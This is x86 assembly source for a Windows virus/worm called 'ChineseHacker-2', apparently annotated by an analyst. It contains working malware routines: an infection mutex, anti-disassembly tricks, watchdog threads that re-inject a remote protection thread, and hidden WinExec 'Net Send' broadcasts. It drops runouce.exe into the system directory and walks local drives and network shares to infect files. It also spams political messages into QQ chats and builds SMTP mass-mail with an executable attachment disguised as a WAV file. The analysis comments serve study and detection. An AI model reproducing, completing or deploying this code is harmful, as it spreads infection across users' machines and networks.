call PushMutexName
db 'ChineseHacker-2',0
PushMutexName:
call [esi.KnlCreateMutexA],0,0
call [esi.KnlGetLastError]
or eax,eax ;检查病毒是否已经运行
jz short ExecOldProgram
int 3; ;人工引发异常执行原程序,JmpOldApp
db 0e9h ;静态反汇编干扰
;-----------------------------------------------------------------------
; CheckRemoteAndWait — first watchdog stage for the "remote thread"
; protection helper.
; In:    esi = pointer to the virus data/API table; [esi.Knl*] fields
;        hold resolved kernel32 entry points, [esi.DataRemoteThread]
;        holds a thread handle (filled in outside this block)
; Out:   never returns normally: either loops here, or falls through
;        to AddWordToQQMsg when the wait does not fail
; Clobb: eax, ecx; esi is saved/restored around the SEH detour
; Note:  every `db 0e9h` below is never executed — it is filler that
;        makes a linear disassembler treat the following bytes as a
;        jmp displacement (original comment: "static disassembly
;        interference").
; Analysis note: the "Net Send *" command line is a host-visible
; indicator (a net-send broadcast naming "ChineseHacker-2 Monitor").
;-----------------------------------------------------------------------
CheckRemoteAndWait:
mov eax,[esi.DataRemoteThread]
call [esi.KnlWaitForSingleObject],eax,1000*60; timeout = 60 000 ms (one minute)
cmp eax,-1 ;original comment says "sleep 8 hours", but the timeout above is 1 minute; -1 = WAIT_FAILED (handle no longer valid)
jnz short AddWordToQQMsg ;wait succeeded or timed out -> second watchdog stage
NeedCreateRemote:
push esi ;preserved across the SEH-driven detour; restored at `pop esi` below
call PushWaitErrorProc ;pushes the address of the `pop esi` below; that address becomes the SEH resume point
pop esi
call GetNetSendMsg ;call/db idiom: leaves the address of the string on the stack
db 'Net Send * My god! Some one killed ChineseHacker-2 Monitor',0
GetNetSendMsg:
pop eax ;eax = address of the command line above
call [esi.KnlWinExec],eax,0 ;WinExec(cmdline, 0 = SW_HIDE)
jmp short CheckRemoteAndWait
PushWaitErrorProc:
pop ecx ;ecx = return address (the `pop esi` at NeedCreateRemote) = resume address for SetSehFrame
call SetSehFrame ;install the exception handler; a fault now resumes execution at ecx
call ProcessProtect ;re-create the remote protection thread; original comment says it raises an exception internally, which is how control reaches the resume point
db 0e9h ;static-disassembly interference (never executed)
;-----------------------------------------------------------------------
; AddWordToQQMsg / CheckRemoteAndWaitAgain — second watchdog stage.
; Reached by fall-through from CheckRemoteAndWait's `jnz`.
; In:    esi = virus data/API table; ebx = a thread handle set outside
;        this block (TerminateThread is called on it) — confirm caller
; Out:   edi = runtime address of GetVirusBaseInRegEdi (code base)
; Clobb: eax, ecx, edi; esi saved/restored around the SEH detour
; Note:  same call/pop + SetSehFrame pattern as the first stage; the
;        `db 0e9h` bytes are anti-disassembly filler, never executed.
;-----------------------------------------------------------------------
AddWordToQQMsg:
call GetVirusBaseInRegEdi ;call/pop: edi = address of the next label, i.e. where this code is currently loaded
GetVirusBaseInRegEdi:
pop edi
CheckRemoteAndWaitAgain:
mov eax,[esi.DataRemoteThread]
call [esi.KnlWaitForSingleObject],eax,1000*60; timeout = 60 000 ms (original comment says "10 minutes")
push eax ;keep the wait result across the next call
call [esi.KnlTerminateThread],ebx,0 ;TerminateThread(ebx, exit code 0)
pop eax
cmp eax,-1 ;WAIT_FAILED -> the protection thread handle is gone
jz short NeedCreateRemoteAgain
int 3; ;deliberate breakpoint exception; the currently installed SEH handler decides where execution resumes (original comment: "continue searching files")
db 0e9h ;static-disassembly interference (never executed)
NeedCreateRemoteAgain:
push esi
call PushWaitErrorProcAgain ;return address (= the `pop esi` below) becomes the SEH resume point
pop esi
jmp short CheckRemoteAndWaitAgain
PushWaitErrorProcAgain:
pop ecx ;ecx = resume address for SetSehFrame
call SetSehFrame
call ProcessProtect ;re-create the remote protection thread; original comment: contains a deliberate exception
db 0e9h ;static-disassembly interference (never executed)
;-----------------------------------------------------------------------
; PushNextRunErrorProc / RegisterProtect — installs an SEH resume point
; (original comment: "protect registry and create remote thread") and
; starts building the virus file path in a 100h-byte stack buffer.
; In:    return address on the stack (popped into ecx as resume point)
; Out:   edi = esp = start of the path buffer filled by
;        BuildVirusPathInStack
; NOTE(review): in this excerpt the code runs straight into
; PushKnlApiStr below, which begins with `pop eax`; either lines are
; missing between the two or control is transferred elsewhere before
; that point — cannot tell from here.
;-----------------------------------------------------------------------
PushNextRunErrorProc: ;protect the registry and create the remote thread (original comment)
pop ecx ;ecx = caller's return address = address to resume at when an exception is ignored
call SetSehFrame
RegisterProtect:
sub esp,100h ;reserve 100h bytes for the virus path
call BuildVirusPathInStack,esp ;fills the buffer with <system dir>\runouce.exe
mov edi,esp ;edi -> path buffer
;-----------------------------------------------------------------------
; PushKnlApiStr — leaves the addresses of 34 kernel32 export-name
; strings on the stack and returns with their count.
; Mechanism: each `call PushKnlApiStrNN` pushes the address of the
; string that directly follows it, then execution continues at the
; label after the string. No import table is needed for these names.
; In:    return address on the stack
; Out:   esp -> 34 string pointers (first = 'LoadLibraryA', last =
;        'GetSystemTime'); ecx = number of pointers (34)
; Clobb: eax, ecx
; Analysis note: the plaintext API names (e.g. CreateRemoteThread,
; WriteProcessMemory, RegisterServiceProcess, _lopen/_lwrite) are a
; convenient static signature for this component.
;-----------------------------------------------------------------------
PushKnlApiStr: ;:ecx = number of function names (original comment)
pop eax ;eax = return address; returned to with `jmp eax` after the pointers are laid out
mov ecx,esp ;remember esp before the string pointers are pushed
call PushKnlApiStr33 ;pushes the address of 'GetSystemTime'
db 'GetSystemTime',0
PushKnlApiStr33:
call PushKnlApiStr32
db 'GetComputerNameA',0
PushKnlApiStr32:
call PushKnlApiStr31
db 'WideCharToMultiByte',0
PushKnlApiStr31:
call PushKnlApiStr30
db 'TerminateThread',0
PushKnlApiStr30:
call PushKnlApiStr29
db 'CreateThread',0
PushKnlApiStr29:
call PushKnlApiStr28
db '_lcreat',0
PushKnlApiStr28:
call PushKnlApiStr27
db 'GetSystemDirectoryA',0
PushKnlApiStr27:
call PushKnlApiStr26
db 'VirtualAllocEx',0
PushKnlApiStr26:
call PushKnlApiStr25
db 'WaitForSingleObject',0
PushKnlApiStr25:
call PushKnlApiStr24
db 'CloseHandle',0
PushKnlApiStr24:
call PushKnlApiStr23
db 'CreateKernelThread',0
PushKnlApiStr23:
call PushKnlApiStr22
db 'CreateRemoteThread',0
PushKnlApiStr22:
call PushKnlApiStr21
db 'WriteProcessMemory',0
PushKnlApiStr21:
call PushKnlApiStr20
db 'OpenProcess',0
PushKnlApiStr20:
call PushKnlApiStr19
db 'GetCurrentProcessId',0
PushKnlApiStr19:
call PushKnlApiStr18
db 'RegisterServiceProcess',0
PushKnlApiStr18:
call PushKnlApiStr17
db 'Sleep',0
PushKnlApiStr17:
call PushKnlApiStr16
db '_lclose',0
PushKnlApiStr16:
call PushKnlApiStr15
db '_llseek',0
PushKnlApiStr15:
call PushKnlApiStr14
db '_lwrite',0
PushKnlApiStr14:
call PushKnlApiStr13
db '_lread',0
PushKnlApiStr13:
call PushKnlApiStr12
db '_lopen',0
PushKnlApiStr12:
call PushKnlApiStr11
db 'SetFileTime',0
PushKnlApiStr11:
call PushKnlApiStr10
db 'SetFileAttributesA',0
PushKnlApiStr10:
call PushKnlApiStr09
db 'FindClose',0
PushKnlApiStr09:
call PushKnlApiStr08
db 'FindNextFileA',0
PushKnlApiStr08:
call PushKnlApiStr07
db 'FindFirstFileA',0
PushKnlApiStr07:
call PushKnlApiStr06
db 'SetCurrentDirectoryA',0
PushKnlApiStr06:
call PushKnlApiStr05
db 'GetDriveTypeA',0
PushKnlApiStr05:
call PushKnlApiStr04
db 'WinExec',0
PushKnlApiStr04:
call PushKnlApiStr03
db 'GetCommandLineA',0
PushKnlApiStr03:
call PushKnlApiStr02
db 'GetLastError',0
PushKnlApiStr02:
call PushKnlApiStr01
db 'CreateMutexA',0
PushKnlApiStr01:
call PushKnlApiStr00
db 'LoadLibraryA',0
PushKnlApiStr00:
sub ecx,esp ;bytes pushed = 4 * number of strings
shr ecx,2 ;ecx = number of string pointers
jmp eax ;return to the caller, leaving the pointers on the stack
db 0e9h ;static-disassembly interference (never executed)
;-----------------------------------------------------------------------
; PushUser32ApiStr — same call/db technique as PushKnlApiStr, for six
; user32 export names.
; In:    return address on the stack
; Out:   esp -> 6 string pointers (first = 'GetWindowThreadProcessId',
;        last = 'wsprintfA'); ecx = 6
; Clobb: eax, ecx
;-----------------------------------------------------------------------
PushUser32ApiStr:
pop eax ;eax = return address
mov ecx,esp ;esp before the pointers are pushed
call PushUser32ApiStr05
db 'wsprintfA',0
PushUser32ApiStr05:
call PushUser32ApiStr04
db 'SendMessageA',0
PushUser32ApiStr04:
call PushUser32ApiStr03
db 'GetWindow',0
PushUser32ApiStr03:
call PushUser32ApiStr02
db 'MessageBoxA',0
PushUser32ApiStr02:
call PushUser32ApiStr01
db 'FindWindowA',0
PushUser32ApiStr01:
call PushUser32ApiStr00
db 'GetWindowThreadProcessId',0
PushUser32ApiStr00:
sub ecx,esp
shr ecx,2 ;ecx = pointer count
jmp eax ;return, pointers left on the stack
db 0e9h ;static-disassembly interference (never executed)
;-----------------------------------------------------------------------
; PushAdvApiStr — call/db table of four advapi32 registry export names.
; In:    return address on the stack
; Out:   esp -> 4 string pointers (first = 'RegOpenKeyA', last =
;        'RegNotifyChangeKeyValue'); ecx = 4
; Clobb: eax, ecx
; Analysis note: RegNotifyChangeKeyValue + RegSetValueExA together
; are the registry-persistence "guard" used by RegisterProtectProc.
;-----------------------------------------------------------------------
PushAdvApiStr:
pop eax ;eax = return address
mov ecx,esp
call PushAdvApi03
db 'RegNotifyChangeKeyValue',0
PushAdvApi03:
call PushAdvApi02
db 'RegQueryValueExA',0
PushAdvApi02:
call PushAdvApi01
db 'RegSetValueExA',0
PushAdvApi01:
call PushAdvApi00
db 'RegOpenKeyA',0
PushAdvApi00:
sub ecx,esp
shr ecx,2 ;ecx = pointer count
jmp eax
db 0e9h ;static-disassembly interference (never executed)
;-----------------------------------------------------------------------
; PushMprApiStr — call/db table of three mpr.dll network-enumeration
; export names.
; In:    return address on the stack
; Out:   esp -> 3 string pointers (first = 'WNetOpenEnumA', last =
;        'WNetCloseEnum'); ecx = 3
; Clobb: eax, ecx
; Style: the label PushMprAPiStr02 is capitalised differently from its
;        siblings (PushMprApiStr01/00).
;-----------------------------------------------------------------------
PushMprApiStr:
pop eax ;eax = return address
mov ecx,esp
call PushMprAPiStr02
db 'WNetCloseEnum',0
PushMprAPiStr02:
call PushMprApiStr01
db 'WNetEnumResourceA',0
PushMprApiStr01:
call PushMprApiStr00
db 'WNetOpenEnumA',0
PushMprApiStr00:
sub ecx,esp
shr ecx,2 ;ecx = pointer count
jmp eax
db 0e9h ;static-disassembly interference (never executed)
;-----------------------------------------------------------------------
; PushWsApiStr — call/db table of nine Winsock export names (used by the
; mail-sending path; FormatMailHeader builds the SMTP dialogue).
; In:    return address on the stack
; Out:   esp -> 9 string pointers (first = 'WSAStartup', last = 'recv');
;        ecx = 9
; Clobb: eax, ecx
;-----------------------------------------------------------------------
PushWsApiStr:
pop eax ;eax = return address
mov ecx,esp
call PushWsApiStr08
db 'recv',0
PushWsApiStr08:
call PushWsApiStr07
db 'closesocket',0
PushWsApiStr07:
call PushWsApiStr06
db 'socket',0
PushWsApiStr06:
call PushWsApiStr05
db 'connect',0
PushWsApiStr05:
call PushWsApiStr04
db 'gethostbyname',0
PushWsApiStr04:
call PushWsApiStr03
db 'htons',0
PushWsApiStr03:
call PushWsApiStr02
db 'send',0
PushWsApiStr02:
call PushWsApiStr01
db 'WSACleanup',0
PushWsApiStr01:
call PushWsApiStr00
db 'WSAStartup',0
PushWsApiStr00:
sub ecx,esp
shr ecx,2 ;ecx = pointer count
jmp eax
db 0e9h ;static-disassembly interference (never executed)
;-----------------------------------------------------------------------
; PushQQMsg — call/db table of the eight message strings that SendQQMsg
; pastes into a QQ chat window.
; In:    return address on the stack
; Out:   esp -> 8 string pointers; ecx = bytes pushed (32), NOT the
;        count — unlike the API tables there is no `shr ecx,2`, and
;        SendQQMsg uses ecx directly for `add esp,ecx`
; Clobb: eax, ecx
;-----------------------------------------------------------------------
PushQQMsg:
pop eax ;eax = return address
mov ecx,esp
call PushQQMsg00
db '枪毙李洪志!',0
PushQQMsg00:
call PushQQMsg01
db '去他妈的***!',0
PushQQMsg01:
call PushQQMsg02
db '反对邪教,崇尚科学!',0
PushQQMsg02:
call PushQQMsg03
db '打倒本拉登!',0
PushQQMsg03:
call PushQQMsg04
db '向英雄王伟致意!',0
PushQQMsg04:
call PushQQMsg05
db '反对霸权主义!',0
PushQQMsg05:
call PushQQMsg06
db '世界需要和平!',0
PushQQMsg06:
call PushQQMsg07
db '社会主义好!',0
PushQQMsg07:
sub ecx,esp ;ecx = size in bytes of the pointer block (8 * 4)
jmp eax
db 0e9h ;static-disassembly interference (never executed)
;-----------------------------------------------------------------------
; BuildVirusPathInStack(Stack) — writes "<system directory>\runouce.exe"
; into the caller-supplied buffer.
; In:    Stack = buffer address (caller reserves 100h bytes);
;        esi = virus data/API table (KnlGetSystemDirectoryA)
; Out:   buffer filled; all registers preserved (pushad/popad)
; Note:  `mov ecx,16` copies 16 bytes, but '\runouce.exe',0 is 13
;        bytes, so three bytes following the literal are copied too.
; Analysis note: "runouce.exe" in the system directory is the dropped
; file name — a host-based indicator for this sample.
;-----------------------------------------------------------------------
BuildVirusPathInStack proc Stack: dword
pushad
mov edi,Stack
call [esi.KnlGetSystemDirectoryA],edi,100h ;eax = length of the system directory string written
add edi,eax ;edi -> terminator of the system directory string
call GetVirusFileName ;call/pop: address of the file-name literal
db '\runouce.exe',0
GetVirusFileName:
pop esi ;esi -> '\runouce.exe' (esi no longer points at the API table inside this proc)
mov ecx,16
cld
rep movsb ;append the file name -> full virus path
popad
ret
BuildVirusPathInStack endp
db 0e9h ;static-disassembly interference (never executed)
;-----------------------------------------------------------------------
; EnumLogDrive — walks drive letters C: through Z: and runs
; EnumFileObject on every fixed/removable/remote/RAM drive.
; In:    esi = virus data/API table (KnlGetDriveTypeA)
; Out:   none
; Clobb: eax, ecx, edx (plus whatever EnumFileObject clobbers)
; Note:  'C:\' is pushed as a dword so the stack slot itself is the
;        NUL-terminated root path "C:\"; `inc edx` advances the drive
;        letter in the low byte. 24 iterations = letters C..Z.
;-----------------------------------------------------------------------
EnumLogDrive proc
;enumerate files on the local logical drives
mov ecx,24 ;24 drive letters: C..Z
mov edx,'\:C' ;little-endian dword = "C:\",0 in memory
ContEnumLogDrive:
push ecx
push edx ;the pushed dword doubles as the root path string
call [esi.KnlGetDriveTypeA],esp
cmp eax,2 ;0 = DRIVE_UNKNOWN, 1 = DRIVE_NO_ROOT_DIR: inaccessible drive
jb short ContNextLogDrive
cmp eax,5 ;5 = DRIVE_CDROM: skipped
jz short ContNextLogDrive
call EnumFileObject,esp ;recurse through the drive starting at its root
ContNextLogDrive:
pop edx
inc edx ;next drive letter
pop ecx
loop short ContEnumLogDrive
ret
EnumLogDrive endp
db 0e9h ;static-disassembly interference (never executed)
;-----------------------------------------------------------------------
; EnumNetResource — walks the network neighbourhood: root -> workgroups
; -> computers -> shares, then enumerates files inside each share.
; In:    esi = virus data/API table; edi = NETRESOURCE pointer for the
;        current level (0 = network root on entry)
; Out:   none
; NOTE(review): every call passes only two arguments (Flag, edi) to a
; proc declared with three (Flag, NetData, CallBack). The third slot is
; therefore occupied by the return address of the enclosing PushEnumNet*
; helper, so EnumNetObject's `call CallBack` re-enters this proc just
; past the call that started the enumeration — the remaining lines then
; act as the "callback" for the next level. This depends on the proc's
; calling convention and stack cleanup; confirm before relying on it.
; The original comments on the PushEnumNet* labels describe the level
; one step deeper than the label name.
;-----------------------------------------------------------------------
EnumNetResource proc
;enumerate network resources
xor edi,edi ;edi: NetData (0 = start at the network root)
call PushEnumNetWorkGroup
call PushEnumNetComputer
call PushEnumNetComputerShareDir
call PushEnumNetFile
mov eax,[edi.lpRemoteName] ;UNC name of the share found at this level
call EnumFileObject,eax;enumerate the files in the shared directory
ret
db 0e9h ;static-disassembly interference (never executed)
PushEnumNetFile: ;enumerate a computer's shared directories (original comment)
call EnumNetObject,RESOURCEUSAGE_CONNECTABLE,edi
ret
db 0e9h ;static-disassembly interference (never executed)
PushEnumNetComputerShareDir: ;enumerate computers (original comment)
call EnumNetObject,RESOURCEUSAGE_CONTAINER,edi
ret
db 0e9h ;static-disassembly interference (never executed)
PushEnumNetComputer: ;enumerate workgroups (original comment)
call EnumNetObject,RESOURCEUSAGE_CONTAINER,edi
ret
db 0e9h ;static-disassembly interference (never executed)
PushEnumNetWorkGroup: ;enumerate the network root (original comment)
call EnumNetObject,RESOURCEUSAGE_CONTAINER,edi
ret
db 0e9h ;static-disassembly interference (never executed)
EnumNetResource endp
;-----------------------------------------------------------------------
; EnumNetObject(Flag, NetData, CallBack) — opens a WNet enumeration and
; invokes CallBack once per resource found.
; In:    Flag = RESOURCEUSAGE_* selector; NetData = parent NETRESOURCE
;        (or 0); CallBack = address invoked with edi -> NETRESOURCE;
;        esi = virus data/API table (Mpr* fields)
; Out:   none; all registers preserved (pushad/popad)
; Stack: a MAX_BUFF_SIZE buffer is reserved for the enumeration results
; Note:  `push L 1h` — `L` is this assembler dialect's size modifier for
;        the immediate; presumably forces a 32-bit push — confirm.
;-----------------------------------------------------------------------
EnumNetObject proc Flag:dword,NetData:dword,CallBack:dword
;enumerates one kind of LAN object (original comment)
pushad
push eax ;stack slot that receives hEnum
call [esi.MprWNetOpenEnumA],RESOURCE_GLOBALNET,RESOURCETYPE_DISK,Flag,NetData,esp ;WNetOpenEnumA(scope, type, usage, lpNetResource, &hEnum)
pop ebx ;ebx = hEnum; also balances the push above
or eax,eax
jnz short EnumNetObjectError ;non-zero = WNet error; nothing to close
sub esp,MAX_BUFF_SIZE;reserve the result buffer on the stack
LoopEnumNetObject:
mov edx,esp ;edx -> result buffer
push L 1h ;cCount = 1: fetch one resource per call
mov eax,esp ;eax -> cCount
push MAX_BUFF_SIZE ;lpBufferSize (in/out)
call [esi.MprWNetEnumResourceA],ebx,eax,edx,esp ;WNetEnumResourceA(hEnum, &cCount, buffer, &size)
pop ecx
pop ecx ;discard the two temporaries
or eax,eax
jnz short EnumNetObjectOver ;NO_MORE_ITEMS or error ends the loop
mov edi,esp ;edi -> NETRESOURCE just returned
call CallBack ;callback receives its argument in edi (original comment)
jmp short LoopEnumNetObject
db 0e9h ;static-disassembly interference (never executed)
EnumNetObjectOver:
call [esi.MprWNetCloseEnum],ebx
add esp,MAX_BUFF_SIZE ;release the result buffer
EnumNetObjectError:
popad
ret
EnumNetObject endp
db 0e9h ;static-disassembly interference (never executed)
;-----------------------------------------------------------------------
; EnumFileObject(BootDir) — recursive directory walk. Calls
; FoundDirObject for the directory itself and FoundFileObject for each
; file; recurses into sub-directories.
; In:    BootDir = NUL-terminated path; esi = virus data/API table
; Out:   none; all registers preserved (pushad/popad); the process's
;        current directory is changed and restored with ".."
; Stack: MAX_BUFF_SIZE bytes used both for the "*.*" pattern and the
;        WIN32_FIND_DATA record
; Notes: - directories whose first four characters fold to "winn"/"wind"
;          are skipped (Windows system directories).
;        - the entry returned by FindFirstFileA is never examined; the
;          loop starts with FindNextFileA (typically skipping ".").
;        - the ".." restore runs even on the FindFirstFileA failure path,
;          but not when SetCurrentDirectoryA itself failed.
;-----------------------------------------------------------------------
EnumFileObject proc BootDir:dword
;enumerates a directory / a shared directory on the network (original comment)
pushad
mov eax,BootDir
mov eax,[eax] ;first four characters of the path
or eax,20202020h ;fold to lower case
cmp eax,'nniw' ;"winn..." directories are not infected
jz short SetDirError
cmp eax,'dniw' ;"wind..." directories are not infected
jz short SetDirError
call [esi.KnlSetCurrentDirectoryA],BootDir ;make BootDir the current directory
or eax,eax
jz short SetDirError ;could not enter the directory
call FoundDirObject,BootDir
sub esp,MAX_BUFF_SIZE;buffer (original comment: 1000h bytes)
mov [esp],L 2a2e2ah ;writes the pattern "*.*",0 at the buffer start
mov eax,esp
call [esi.KnlFindFirstFileA],eax,esp ;pattern and find-data share the buffer; the pattern is consumed before it is overwritten
mov ebx,eax ;ebx = find handle
cmp eax,-1 ;INVALID_HANDLE_VALUE
jz short EnumFileObjectError
LoopEnumFileObject:
call [esi.KnlFindNextFileA],ebx,esp
or eax,eax
jz short EnumFileObjectOver ;no more entries
lea edx,[esp.cFileName] ;edx -> entry name
mov eax,[esp.dwFileAttributes]
and eax,10h ;FILE_ATTRIBUTE_DIRECTORY
jz short IsFileObject
IsDirObject: ;entry is a directory
mov eax,[edx]
cmp al,'.' ;skip "." / ".." (any name starting with a dot)
jz short LoopEnumFileObject
call EnumFileObject,edx;recurse into the sub-directory
jmp short LoopEnumFileObject
db 0e9h ;static-disassembly interference (never executed)
IsFileObject: ;entry is a file
call FoundFileObject,esp;process the file (esp -> WIN32_FIND_DATA)
jmp short LoopEnumFileObject
db 0e9h ;static-disassembly interference (never executed)
EnumFileObjectOver:
call [esi.KnlFindClose],ebx
EnumFileObjectError:
mov dword ptr[esp],L 2e2eh ;writes "..",0 so the parent directory can be restored
call [esi.KnlSetCurrentDirectoryA],esp ;cd ..
add esp,MAX_BUFF_SIZE;release the buffer
SetDirError:
popad
ret
EnumFileObject endp
db 0e9h ;static-disassembly interference (never executed)
;-----------------------------------------------------------------------
; FoundDirObject(DirName) — invokes the directory callback stored in
; FoundDirCallBackAddr under a temporary SEH frame.
; In:    DirName = path; FoundDirCallBackAddr filled in elsewhere
; Out:   none; registers preserved (pushad/popad)
; Flow:  PushOptDirError pops its own return address (the `popad`) and
;        registers it as the SEH resume point; the callback runs; the
;        trailing `int 3` then raises an exception on purpose, and the
;        handler (Exception proc) unwinds to `popad`. Any fault inside
;        the callback takes the same path, which is how errors are
;        "ignored".
;-----------------------------------------------------------------------
FoundDirObject proc DirName: dword
pushad
call PushOptDirError
popad
ret
db 0e9h ;static-disassembly interference (never executed)
PushOptDirError:
pop ecx ;ecx = address of `popad` above = resume point for ignored exceptions
call SetSehFrame
call GetFoundDirCallBackAddr ;edx -> FoundDirCallBackAddr slot
call [edx],DirName ;callback(DirName)
int 3 ;deliberate exception: returns through the SEH handler to `popad`
FoundDirObject endp
db 0e9h ;static-disassembly interference (never executed; comment truncated in the source)
;-----------------------------------------------------------------------
; FoundFileObject(FindData) — invokes the file callback stored in
; FoundFileCallBackAddr under a temporary SEH frame.
; In:    FindData -> WIN32_FIND_DATA of the file;
;        FoundFileCallBackAddr filled in elsewhere
; Out:   none; registers preserved (pushad/popad)
; Flow:  identical to FoundDirObject: the `popad` address becomes the
;        SEH resume point, the callback runs, and the trailing `int 3`
;        (or any fault inside the callback) returns via the handler.
;-----------------------------------------------------------------------
FoundFileObject proc FindData:dword
pushad
call PushOptFileError
popad
ret
db 0e9h ;static-disassembly interference (never executed)
PushOptFileError:
pop ecx ;ecx = address of `popad` above = resume point for ignored exceptions
call SetSehFrame
call GetFoundFileCallBackAddr ;edx -> FoundFileCallBackAddr slot
call [edx],FindData ;callback(FindData)
int 3 ;deliberate exception: returns through the SEH handler to `popad`
FoundFileObject endp
db 0e9h ;static-disassembly interference (never executed)
;-----------------------------------------------------------------------
; GetFoundDirCallBackAddr — returns edx = address of the in-code dword
; FoundDirCallBackAddr (call/pop: the `call` pushes the address of the
; data that follows it). The slot itself is `dd ?`, i.e. written at run
; time by code outside this listing — presumably the injector/loader.
; Out:   edx -> FoundDirCallBackAddr
;-----------------------------------------------------------------------
GetFoundDirCallBackAddr:
call PushFoundDirCallBackAddr
FoundDirCallBackAddr dd ? ;holds the directory-callback address (filled at run time)
PushFoundDirCallBackAddr:
pop edx
ret
db 0e9h ;static-disassembly interference (never executed)
;-----------------------------------------------------------------------
; GetFoundFileCallBackAddr — returns edx = address of the in-code dword
; FoundFileCallBackAddr (same call/pop idiom as the directory variant).
; Out:   edx -> FoundFileCallBackAddr (a `dd ?` slot written at run time)
;-----------------------------------------------------------------------
GetFoundFileCallBackAddr:
call PushFoundFileCallBackAddr
FoundFileCallBackAddr dd ? ;holds the file-callback address (filled at run time)
PushFoundFileCallBackAddr:
pop edx
ret
db 0e9h ;static-disassembly interference (never executed)
;-----------------------------------------------------------------------
; GetFileExtName(FileName) — returns the last four bytes of a
; NUL-terminated name, folded to lower case (e.g. ".exe").
; In:    FileName -> NUL-terminated string
; Out:   eax = the 4 bytes immediately before the terminator, OR'd with
;        20202020h
; Clobb: eax, flags
; Notes: - the scan increments before testing, so the first byte is
;          never checked (an empty string runs past its terminator).
;        - names shorter than four bytes cause a read before the start
;          of the string.
;-----------------------------------------------------------------------
GetFileExtName proc FileName: dword
mov eax,FileName
ContIncEax:
inc eax
cmp byte ptr[eax],0 ;find the terminator
jnz short ContIncEax
mov eax,[eax-4] ;four bytes ending at the terminator
or eax,20202020h ;lower-case fold
ret
GetFileExtName endp
db 0e9h ;static-disassembly interference (never executed)
;-----------------------------------------------------------------------
; OptLocalDir(DirName) — per-directory callback for the local walk; only
; sleeps 10 ms to keep CPU usage inconspicuous (original comment).
; In:    DirName (unused); esi = virus data/API table (KnlSleep)
;-----------------------------------------------------------------------
OptLocalDir proc DirName: dword
call [esi.KnlSleep],10;Sleep(10 ms) to avoid a suspicious CPU-usage spike
ret
OptLocalDir endp
db 0e9h ;static-disassembly interference (never executed)
;-----------------------------------------------------------------------
; FormatMailHeader(MailHeader, eMail) — formats the SMTP dialogue and
; MIME header for the mail-propagation path.
; In:    MailHeader -> output buffer; eMail -> recipient address;
;        esi = virus data/API table (KnlGetComputerNameA, UserwsprintfA)
; Out:   eax = wsprintfA's return value (characters written)
; Stack: 100h-byte temporary for the computer name
; Format arguments, in order: RCPT TO %s = eMail, FROM %s@yahoo.com =
; computer name, TO %s = eMail, SUBJECT %s is comming = computer name.
; Analysis note: "HELO btamail.net.cn", "imissyou@btamail.net.cn" and
; the attachment name "pp.exe" (declared as audio/x-wav) are
; network-visible indicators for mail filtering.
;-----------------------------------------------------------------------
FormatMailHeader proc MailHeader: dword,eMail: dword
local MailHeaderLong: dword
pushad
mov eax,100h
sub esp,eax ;100h-byte buffer for the computer name
mov edx,esp ;edx -> buffer
push eax ;size in/out parameter (100h)
call [esi.KnlGetComputerNameA],edx,esp ;GetComputerNameA(buffer, &size)
pop eax
call PushMailData ;call/pop: address of the format string
db 'HELO btamail.net.cn',0dh,0ah
db 'MAIL FROM: imissyou@btamail.net.cn',0dh,0ah
db 'RCPT TO: %s',0dh,0ah
db 'DATA',0dh,0ah
db 'FROM: %s@yahoo.com',0dh,0ah
db 'TO: %s',0dh,0ah
db 'SUBJECT: %s is comming!',0dh,0ah
db 'MIME-Version: 1.0',0dh,0ah
db 'Content-type: multipart/mixed; boundary="#BOUNDARY#"',0dh,0ah
db 0dh,0ah
db '--#BOUNDARY#',0dh,0ah
db 'Content-Type: text/html',0dh,0ah
db 'Content-Transfer-Encoding: quoted-printable',0dh,0ah
db 0dh,0ah
db '',0dh,0ah
db 0dh,0ah
db '--#BOUNDARY#',0dh,0ah
db 'MIME-Version: 1.0',0dh,0ah
db 'Content-Type: audio/x-wav; name="pp.exe"',0dh,0ah
db 'Content-Transfer-Encoding: base64',0dh,0ah
db 'Content-id: THE-CID',0dh,0ah
db 0dh,0ah,0
PushMailData:
pop eax ;eax -> format string
mov edi,esp ;edi = esp before the variadic call, and -> computer name buffer
call [esi.UserwsprintfA],MailHeader,eax,eMail,edi,eMail,edi ;wsprintfA(out, fmt, eMail, name, eMail, name)
mov esp,edi ;wsprintfA is caller-cleanup: drop its arguments
mov MailHeaderLong,eax ;keep the length across popad
add esp,100h ;release the name buffer
popad
mov eax,MailHeaderLong
ret
FormatMailHeader endp
;-----------------------------------------------------------------------
; AnsiToBase64(AnsiBuff, AnsiSize, Base64Buff) — base64-encodes a byte
; buffer one bit at a time (GetBit supplies each input bit).
; In:    AnsiBuff -> input; AnsiSize = input length in bytes;
;        Base64Buff -> output (NUL-terminated on return)
; Out:   eax = number of output characters, not counting the NUL
; Clobb: none (pushad/popad); esi is re-pointed at the alphabet inside
;        the proc, so [esi.*] API fields are unavailable here
; Algorithm: edx = bits remaining; each round shifts 6 bits into eax,
;   looks the value up in Base64Char and stores it. When the input ends
;   mid-group (GetBitOver), the partial value is left-justified with
;   `shl eax,cl`, stored, and ecx/2 '=' characters are appended.
; Notes: - AnsiSize = 0 does not terminate: `dec edx` wraps to -1 and
;          the loop keeps reading bits well past the buffer.
;        - cld is re-issued before every string op; harmless.
;-----------------------------------------------------------------------
AnsiToBase64 proc AnsiBuff: dword,AnsiSize:dword,Base64Buff:dword
local nBase64Size: dword
pushad
mov nBase64Size,0
call GetBase64Char ;call/pop: address of the alphabet
Base64Char db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
db 'abcdefghijklmnopqrstuvwxyz'
db '0123456789+/',0
GetBase64Char:
pop esi ;esi = offset Base64Char
mov edi,Base64Buff ;edi = output cursor
mov edx,AnsiSize
shl edx,3 ;edx = total number of input bits
xor ebx,ebx ;ebx = current bit index
ContTurn:
xor eax,eax ;eax = 6-bit accumulator
mov ecx,6 ;bits per output character
ContGetBit:
shl eax,1
call GetBit,AnsiBuff,ebx ;OR bit ebx of AnsiBuff into al
dec edx
jz short GetBitOver ;last input bit consumed
inc ebx
loop short ContGetBit
mov al,[esi+eax] ;alphabet lookup
cld
stosb
inc nBase64Size
jmp short ContTurn
GetBitOver:
dec ecx ;ecx = bits missing from this group (0, 2 or 4)
shl eax,cl ;left-justify the partial group
mov al,[esi+eax]
cld
stosb
inc nBase64Size
shr ecx,1 ;one '=' per two missing bits (original comment)
add nBase64Size,ecx
mov al,'=' ;padding character
cld
rep stosb
xor al,al
stosb ;NUL terminator (not counted in the return value)
popad
mov eax,nBase64Size
ret
AnsiToBase64 endp
;AnsiToBase64 helper: fetches the value of a single input bit
;-----------------------------------------------------------------------
